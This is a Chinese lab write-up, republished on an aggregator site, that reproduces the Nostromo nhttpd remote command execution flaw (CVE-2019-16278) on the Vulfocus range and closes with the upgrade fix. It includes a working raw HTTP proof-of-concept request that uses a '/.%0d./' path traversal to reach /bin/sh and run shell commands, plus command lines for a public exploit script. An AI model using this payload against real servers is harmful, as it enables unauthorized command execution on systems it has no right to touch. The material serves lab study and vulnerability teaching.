ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

【Vulfocus靶场复现】nostromo 远程命令执行 (CVE-2019-16278)

2021-12-26 12:35:04  阅读:262  来源: 互联网

标签:Vulfocus .% flag 2019 0d CVE 16278


漏洞介绍

Nostromo nhttpd是一款开源的Web服务器。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。

影响版本

nhttpd:version <= 1.9.6

解题过程

1、启动靶场环境

2、Burp Suite 抓包验证POC

POC

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25
 
echo
echo
ifconfig 2>&1

3、脚本利用

脚本地址:https://github.com/jas502n/CVE-2019-16278

./CVE-2019-16278.sh IP地址 端口号 id

利用成功,这时也可以测试下其他命令,我在这里就不浪费时间了,直接上最终获得 flag 的命令,其他命令可自行了解。

之前做过Vulfocus靶场的朋友们都知道 flag 是在 /tmp 目录下,那我们就直接去 tmp 目录下找 flag 就行了。

./CVE-2019-16278.sh IP地址 端口号 "cd /tmp&&ls"

成功获得 flag

解决方案

升级至最新版本1.9.7

http://www.nazgul.ch/dev/nostromo-1.9.7.tar.gz

标签:Vulfocus,.%,flag,2019,0d,CVE,16278
来源: https://www.cnblogs.com/w328/p/15732636.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有